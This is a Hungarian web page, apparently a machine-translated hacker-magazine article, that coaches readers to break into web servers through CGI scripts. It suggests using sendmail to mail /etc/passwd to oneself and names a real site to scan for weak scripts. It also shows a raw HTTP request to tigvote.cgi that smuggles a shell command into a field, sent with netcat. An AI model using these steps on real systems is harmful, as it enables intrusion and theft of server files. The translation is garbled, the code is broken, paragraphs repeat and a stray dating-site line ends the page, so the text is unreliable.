Hacking (rongálás) - hackelés és rongálás oldalak -% ifth1% 0% -% ifen1% 0% - Kiadó - Personal helyszínen

Itt kell folyamatosan olvassa el a magazin (Hacker), és úgy gondolja: „Mégis, ez nem nekem való ez túl bonyolult, és ez nem világos ...” De most már az idő, amikor azt fogja mondani, hogyan lehet gyorsan és nem sok erőlködés megtörni semmilyen servak. Nos, kíváncsivá te? Ha igen, akkor olvasson tovább, semmi bonyolult ebben a cikkben nem, és ha kicsit is elképzelhető, hogy a szerver fut, és egy kicsit ismeri a C iliPerl, akkor azonnal foglalkozik mindezt, és lesz egy igazi jó haksorom.

Ma, a dolgok, mint a vendégkönyvben, keresés szerver formájában küldött üzenetek - alapvető tulajdonsága szinte minden nagyobb oldalon. Milyen komoly, most még a honlapok próbálja belegyömöszölni a lehető legnagyobb mértékben mindenféle kérdőíveket, szavazás, stb ).

Először is, azt hiszem, meg kell érteni a fogalmakat (általános szétszerelés és koncepciók - ma nagyon fontos :). CGI-script - olyan program, amely fut a web-szerver a vevő kérésére. Az ügyfél, mint tudjuk - nem más, mint te;). ez a program alapvetően nem különbözik a szokásos programok vannak telepítve a számítógépen -, hogy ez a Word vagy a Quake. CGI - ez nem egy programozási nyelv, amelyben a script van írva, és a Common Gateway Interface - egy speciális interfész segítségével, amelyben van egy script fut, és kölcsönhatásba vele.

Hogyan működik a CGI-szkript? Természetesen tudok szorítani egy kis technikai útmutatást, de az előnyeit ez nem lesz elég. Ezért, hogy magyarázza meg, hogyan történik, az ujjakon. Tehát az oldal a látogató kitölti a mezőben, például, hogy írjon az vendégkönyvet. Utána rákattint a „Küldés” gombra (vagy bármilyen más, például „Email”), azaz a cgi-script. A szkript végzi el a beprogramozott - ebben az esetben beolvassa az adatokat a forma és kiírja a vendégkönyvben fájl - és küldje el a böngésző egyszerű HTML-kód, például, a következő üzenettel: „Haver, ráérsz Ez kész vár rád barátnője ...”

Ha törni valamit, és az ügy bíróság elé kerül, akkor szembe:

1. Illetéktelen hozzáférés joga védett számítógépes adatokat, azaz az információt a gép hordozó, elektronikusan számítógép (PC),

2. Ugyanez a jogszabály által elkövetett személyek csoportja előzetes megállapodás vagy egy szervezett csoport vagy egy személy használja a hivatali helyzetével, valamint a hozzáféréssel rendelkező számítógép, számítógépes rendszer vagy a hálózat - kiszabható bírság 500-800 alkalommal a minimálbér, vagy a fizetés vagy egyéb jövedelem időtartamra 5-8 hónap, vagy korrekciós munka időtartamra egy-két év, vagy szabadságvesztés egy ideje 3-6 hónap, vagy szabadságvesztés legfeljebb öt liter a.

Az általános cél a CGI-szkriptek - lehetővé teszi a hozzáférést csak egy bizonyos részét a tárolt adatok a szerveren. Egy ilyen meghatározás azonnal hozza meg az ötlet, hogy akkor valamilyen módon való hozzáférés és az összes információt a szerveren. Sem a szerveren nem tekinthető a 100% biztonságos (break és ***. Gov). A leggyakoribb biztonsági rés - a hiánya ellenőrzések küldeni a script adatok meta-karaktereket (például, például azt, hogy ; `” | *.

<> * () [] <> $), Ami egy script fájlt, vagy a fájl tartalmát is. Elementary megoldás erre a problémára is van egy szűrő bemeneti karakterkészlet, akik naPerl alábbiak szerint:

Azt hiszem, az emberek, akik írni szkripteket - elég lusta, és felejtsd el, vagy nem akar emlékezni, mert a legalapvetőbb teszt a karakter „/” és „..” Még mindig nem, majd ha egyszer jönnek a szerveren, lásd „] [/ - |

Most azt gondolom, hogy egy kicsit elképzelni a szerver és a CGI-scriptek. Itt az ideje, hogy elmagyarázza, hogy kihasználják. Exploit ( „nyomkövetés” az angol „kihasználni”) - egy biztonsági rést, amelyre tervezték egy adott módszer a támadás. Sok kihasználja teszik közzé nyílt forrásokból, és előbb vagy utóbb, a számukra „foltok” (foltok), így a biztonsági rést. Reméljük, hogy a rendszergazda a helyszínen, hogy szeretné megtörni, lusta, és nem tesz semmilyen javítást. Azt kell mondanom, hogy a leggyakoribb hibák a következők:

1. teljesítményt a csapat.

3. futó programokat.

4. hibák sendmail.

5. DoS támadás egy forgatókönyvet.

Bug sendmail segít elsajátítani a szerveren így.

Futó sendmail: sendmail -f [email protected], Hi, pipiska.txt. Ez a parancs küld az én szappan pipiska.txt fájlt. Természetesen ahelyett pipiska.txt jobb megrendelni a / etc / passwd :).

Szóval, remélem, elég elő elméletileg, és most is tenni valamit, többé-kevésbé hasznos.

Először el kell dönteni, hogy szükség van-e vagy sem? Ha szükséges, válasszon egy áldozat, csak azt, hogy figyelmeztesse: ne próbálja megtörni semmilyen www.vvp.ru és www.nasa.gov, mert Tanszék „P” hazánkban nem alszik, és akkor majd a hibás rám :). Ha az áldozat már kiválasztott, akkor megy, és töltse le a CGI-szkenner. Nem tudom, mi ez? Ezután meg kell Special # 11 (22), ahol adtam összehasonlító áttekintést a legkényelmesebb és yuzaemyh CGI - ellenőrző. Megmutatom mindent VoidEye2k példa.

Szóval, a beállításokat magad számára nyilvánvaló, a felület tiszta és a baba. Arra kérjük a szerveren, és várjon néhány percig). Tehát, ha a szkennelés www.kronex.ru talált tigvote.cgi script. „Na és?” - mondod. És az a tény, hogy most fut www.void.ru, nézd, ha a cikk „CGI-ZHUKS - részletesen és orosz”, és nézd meg ott kihasználni. ezt olvassuk:

Hely: /cgi-bin/tigvote.cgi (csak ahol találtuk).

Ez a script lehetővé teszi, hogy szervezzen egy szavazás az oldalon, és a fájl neve az adatbázis hang továbbítjuk a forgatókönyvet, mint a paraméter. A gondos vizsgálata a forráskód a script, akkor megtalálja a helyét, hogy olvassa űrlap adatokat történt és hozzárendelése egyes változó fájl neve:

Mint látható, nincs ellenőrzés a különböző karakterek, beleértve | /. Továbblépve, azt látjuk, a vonal nyitott FILE „$ filename”;. Nincs egységes kezelése a húr telt el, és minden nem alfanumerikus karaktert küldi a uuencode, ezért a böngésző nem lesz képes elvégezni a biztonsági rés kihasználását.

Az alábbi példa egy lekérdezést, amely végrehajtja a parancsot echo Hi a fogadó áldozat. Annak érdekében, hogy egy ilyen kérelem lehet, például, netkatom (közel azonos tOlnet):

[[email protected]] $ cat zapros
POST /cgi-bin/tigvote.cgi HTTP / 1.1
Accept: * / *
Accept-Language: ru
Content-Type: application / x-www-form-urlencoded
Accept-Encoding: gzip, kienged
User-Agent: Smith ügynök
Host: www.kronex.ru
Content-Length: 33
Csatlakozás: Keep-Alive
file = chmod 777 * | tigvote = cho + hi
[[email protected]] $ nc www.victim.com out.log”.

Ez minden,). Azt hittem, hogy nehéz? Kiderül, hogy nincs olyan hely, annál jobb;). De szem előtt tartani, hogy a szám a servakov a szivárgó szkriptek csökken (mármint azok servaki, amelyek szórakoztató megtörni, nem www.vasiapupkin.h1.ru).

Ha bármilyen további kérdése van, a szappanok mindig nyitva van.

De most már az idő, amikor azt fogja mondani, hogyan lehet gyorsan és nem sok erőlködés megtörni semmilyen servak.

Hogyan működik a CGI-szkript? Természetesen tudok szorítani egy kis technikai útmutatást, de az előnyeit ez nem lesz elég. Ezért, hogy magyarázza meg, hogyan történik, az ujjakon.

n Tagil társkereső